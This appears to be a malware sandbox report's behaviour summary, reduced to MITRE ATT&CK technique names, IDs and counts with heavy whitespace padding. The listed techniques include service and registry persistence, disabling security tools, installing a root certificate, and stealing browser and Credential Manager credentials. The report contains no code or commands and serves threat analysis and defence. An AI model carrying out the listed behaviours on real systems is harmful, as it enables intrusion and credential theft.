                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1543

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Windows Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1543.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1546

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Change Default File Association

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1546.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Access Token Manipulation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1134

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Create Process with Token

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1134.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1547.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1543

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Windows Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1543.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1546

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Change Default File Association

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1546.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Access Token Manipulation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1134

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Create Process with Token

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1134.002

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Direct Volume Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1006

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Hide Artifacts

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1564

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1564.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1562

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1562.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Indicator Removal

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1070

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            File Deletion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1070.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1553

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1553.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1555

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1555.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Windows Credential Manager

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1555.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1552

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Credentials In Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1552.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Browser Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1217

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Network Service Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1046

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Network Share Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1135

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1614

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1614.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            System Network Configuration Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1016

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Internet Connection Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1016.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
